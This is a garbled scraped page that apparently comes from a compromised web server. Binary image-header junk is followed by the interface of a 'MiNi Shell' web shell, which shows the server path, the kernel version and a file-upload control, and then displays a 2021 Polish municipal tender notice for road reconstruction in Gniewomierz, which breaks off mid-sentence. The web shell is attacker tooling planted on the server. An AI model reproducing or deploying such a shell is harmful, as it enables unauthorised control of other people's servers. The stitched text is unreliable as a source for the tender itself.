JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211203/0029957701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej –w miejscowości Gniewomierz w ramach poprawy bezpieczeństwa ruchu drogowego na przejściach dla pieszych w systemie zaprojektuj i wybuduj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Legnickie Pole</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647481</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kiliana Ignacego Dientzenhofera 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Legnickie Pole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-241</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@legnickiepole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.legnickiepole.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej –w miejscowości Gniewomierz w ramach poprawy bezpieczeństwa ruchu drogowego na przejściach dla pieszych w systemie zaprojektuj i wybuduj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-625cb1f7-5458-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00299577</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.legnickiepole.pl/przetargi-zamowienia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://bip.legnickiepole.pl/przetargi-zamowienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej:<br/>a) miniPortalu: https://miniportal.uzp.gov.pl/<br/>b) ePUAPu: : ePUAP URZĄD GMINY LEGNICKIE: (/0x9ekme31w/skrytka)<br/>c) poczty elektronicznej:<br/>- w zakresie przedmiotu zamówienia: Krzysztof Broszczak – k.broszczak@legnickiepole.pl<br/>- w pozostałym zakresie: Waldemar Hreczany - org1@legnickiepole.pl<br/>Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej (e-mail:<br/>org.1@legnickiepole.pl) - przesyłanie dokumentów i oświadczeń (poza ofertą i dokumentami złożonymi<br/>wraz z ofertą).<br/>8.4. W związku z powyższym Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do<br/>komunikacji.<br/>8.5. Rejestracja i korzystanie z miniPortalu i ePuap jest bezpłatne.<br/>8.6. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>przekazywanych przy użyciu miniPortalu i ePuap opisane zostały w Instrukcji użytkownika systemu<br/>miniPortal (dostępny po adresem: https://miniportal.uzp.gov.pl/Instrukcje<br/>8.7. Maksymalny rozmiar pliku przesyłanego za pośrednictwem dedykowanych formularzy do złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://bip.legnickiepole.pl/przetargi-zamowienia, https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">4) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2<br/>RODO:<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:<br/>a) Administratorem danych osobowych przetwarzanych w związku z realizacją umowy jest Wójt Gminy<br/>Legnickie Pole ul. Dientzenhofera 1, 59-241 Legnickie Pole tel. 76 858 28 10, e-mail<br/>sekretariat@legnickiepole.pl<br/>b) Administrator wyznaczył Inspektora Ochrony Danych Mariusza Kanię, z którym można się<br/>skontaktować pocztą elektroniczną na adres: iod@centrumbip.pl oraz telefonicznie tel. 697563417<br/>c) Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego.<br/>d) Odbiorcami Państwa danych osobowych mogą być osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania na podstawie przepisów ustawy o dostępie do informacji<br/>publicznej oraz organy kontrolujące;<br/>e) Państwa dane osobowe będą przechowywane przez okres 4 lat;<br/>f) Obowiązek podania danych osobowych bezpośrednio Państwa dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp;<br/>g) W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO - prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO - prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>6) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel<br/>określony powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż<br/>cel, w którym dane osobowe zostały zebrane (tj. cel określony powyżej), przed takim dalszym<br/>przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich<br/>innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>7) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do<br/>wypełnienia wszystkich obowiązków formalnoprawnych wymaganych przez RODO i związanych z<br/>udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Należą do nich obowiązki<br/>informacyjne z:<br/>- art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te<br/>wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów<br/>składanych na żądanie zamawiającego,<br/>- art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a<br/>które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na<br/>żądanie zamawiającego.<br/>- W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie<br/>uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w<br/>postępowaniu, wykonawca składa oświadczenie o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w<br/>Formularzu oferty stanowiącym załącznik nr 2 do SWZ.<br/>Ogłoszenie nr 2021/BZP 00299570/01 z dnia 2021-12-03<br/>2021-</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROG.271.24.2021.R.TP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> . Przedmiotem zamówienia jest zadanie polegające na:<br/>1)	opracowaniu dokumentacji projektowej wraz z uzyskaniem zgody właściwego organu na prowadzenie robót oraz wszelkich innych decyzji administracyjnych, uzgodnień oraz opinii, niezbędnych do zrealizowania zadania inwestycyjnego – w oparciu o obowiązujące przepisy,<br/>2)	wykonaniu robót budowlanych wraz z niezbędną infrastrukturą towarzyszącą, w oparciu o dokumentację projektową wykonaną przez Wykonawcę robót, obejmujących przebudowę dwóch odcinków drogi gminnej – ul. Asama w miejscowości Legnickie Pole, w ramach której należy przewidzieć budowę m.in. przejścia dla pieszych oraz oświetlenia dedykowanego przejścia dla pieszych, a w szczególności obejmujące:<br/>-	rozbiórkę istniejących nawierzchni drogowych oraz innych elementów korpusu drogowego,<br/>-	rozbiórkę istniejących zjazdów, chodników,<br/>-	rozbiórkę kolidujących urządzeń i sieci istniejącej infrastruktury technicznej,<br/>-	wzmocnienie podłoża gruntowego w zakresie dostosowanym do warunków gruntowo-wodnych,<br/>-	roboty ziemne, podbudowa<br/>-	przebudowę odcinka drogi gminnej,<br/>-	budowę chodników,<br/>-	przebudowę zjazdów,<br/>-	budowę i przebudowę systemu odwodnienia,<br/>-	budowę kanału technologicznego,<br/>-	instalacja oświetlenia ulicznego solarnego odcinek przejścia;<br/>-	zabezpieczenie i przebudowę kolidujących urządzeń obcych infrastruktury zgodnie <br/>z podanymi warunkami technicznymi ich właścicieli,<br/>-	montaż oświetlenia dedykowane przy przejściu dla pieszych;<br/>-	organizacje ruchu oraz urządzenia bezpieczeństwa ruchu drogowego, w tym m.in.: <br/> montaż oznakowania aktywnego na przejściach dla pieszych,<br/> wykonanie oznakowania poziomego i pionowego wynikające z zatwierdzonej SOR,<br/>-	przeprowadzenie uzgodnień z zarządcami dróg publicznych w zakresie przywrócenia dróg użytkowanych przez Wykonawcę w czasie budowy do stanu nie gorszego niż sprzed rozpoczęcia budowy oraz zrealizowanie ww. zobowiązania,<br/>-	pełnienie nadzoru autorskiego,<br/>-	przygotowanie dokumentów do wniosku o pozwolenia na użytkowanie (jeśli będzie taka potrzeba) i zgłoszenia zakończenia robót,<br/>-	sporządzenie inwentaryzacji powykonawczej,<br/>-	po zakończeniu Robót wykonać pełną rekultywację terenów zajętych przez zaplecza techniczne i socjalne, Plac Budowy oraz wszelkich innych terenów przekształconych przez Wykonawcę, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30145000-7 - Części i akcesoria maszyn liczących</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium - Cena ( C ) - 60% - 60 punktów<br/>Okres gwarancji/rękoj mi (T) - 40% - 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp Zamawiający określa warunki udziału w postępowaniu<br/>dotyczące:<br/>6.1.1. Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>6.1.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>6.1.3. Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>6.1.4. Zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca posiada minimalne zdolności techniczne lub zawodowe<br/>zapewniające należyte wykonanie zamówienia, jeżeli Wykonawca wykaże, że:<br/>a) posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno<br/>zadanie polegające na budowie lub rozbudowie lub przebudowie drogi o nawierzchni bitumicznej<br/>i o wartości nie mniejszej niż 2 000 000,00 zł brutto, wraz z podaniem ich rodzaju, wartości, daty<br/>i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie.<br/>Jeżeli w dokumentach składanych w celu potwierdzenia spełnienia warunków udziału w<br/>postępowaniu, kwoty będą wyrażone w walucie obcej - będą one przeliczane na PLN według<br/>średniego kursu w stosunku do danej waluty opublikowanego przez NBP z dnia publikacji<br/>ogłoszenia o zamówieniu. Jeżeli w dniu publikacji ogłoszenia o zamówieniu NBP nie opublikuje<br/>informacji o średnim kursie walut, zamawiający dokonana odpowiednich przeliczeń według<br/>średniego kursu z pierwszego kolejnego dnia, w którym NBP opublikuje wskazane informacje.<br/>b) dysponuje osobami, które będą uczestniczyć w realizacji zamówienia tj.:<br/>- co najmniej 1 osobą na stanowisku Kierownika Budowy. Minimalne wymagania: uprawnienia<br/>budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń<br/>wydane zgodnie z Prawem budowlanym lub odpowiadające im uprawnienia budowlane wydane<br/>na podstawie wcześniej obowiązujących przepisów,<br/>- co najmniej 1 osobą na stanowisku Kierownika robót. Minimalne wymagania: uprawnienia<br/>budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>wydane zgodnie z Prawem budowlanym lub odpowiadające im ważne uprawnienia , które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>- co najmniej 1 osobą pełniąca funkcję kierownika robót Minimalne wymagania: uprawnienia<br/>budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych wydane zgodnie z Prawem<br/>budowlanym lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów,<br/>- co najmniej 1 osobą pełniąca funkcję kierownika robót. Minimalne wymagania: uprawnienia<br/>budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń telekomunikacyjnych wydane zgodnie z Prawem budowlanym lub<br/>odpowiadające im ważne uprawnienia , które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów.<br/>Uwagi:<br/>- Przez uprawnienia budowlane rozumie się uprawnienia wydane na podstawie Rozporządzenia<br/>Ministra Inwestycji i Rozwoju z dnia 29.04.2019 r. w sprawie przygotowania zawodowego do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne<br/>uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im<br/>uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru<br/>Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych<br/>przepisów ustawy z dnia 7 lipca 1994 roku Prawo Budowlane oraz ustawy z dnia 22 grudnia<br/>2015 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwachczłonkowskich Unii Europejskiej.<br/>- Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie,<br/>określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie<br/>kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.<br/>Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z<br/>2020 r., poz. 220).<br/>- W przypadku osób będących obywatelami państw członkowskich UE, Konfederacji<br/>Szwajcarskiej lub państw członkowskich (EFTA) - stron umowy o Europejskim Obszarze<br/>Gospodarczym – prawo do wykonywania samodzielnych funkcji technicznych w budownictwie<br/>na terytorium RP winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji<br/>zawodowych lub prawa do świadczenia usług transgranicznych.<br/>- Dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania przedmiotu<br/>zamówienia) – dla osób, które posiadają uprawnienia uzyskane przed dniem wejścia w życie<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub stwierdzenie posiadania przygotowania<br/>zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały<br/>uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/>6.2. Oceniając zdolność techniczną lub zawodową Zamawiający może, na każdym etapie<br/>postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia.<br/>6.3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych lub sytuacji<br/>finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych.<br/>6.4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>6.5. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu<br/>do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca, realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>6.6. Zobowiązanie podmiotu udostępniającego zasoby ma potwierdzać, że stosunek łączący<br/>wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do 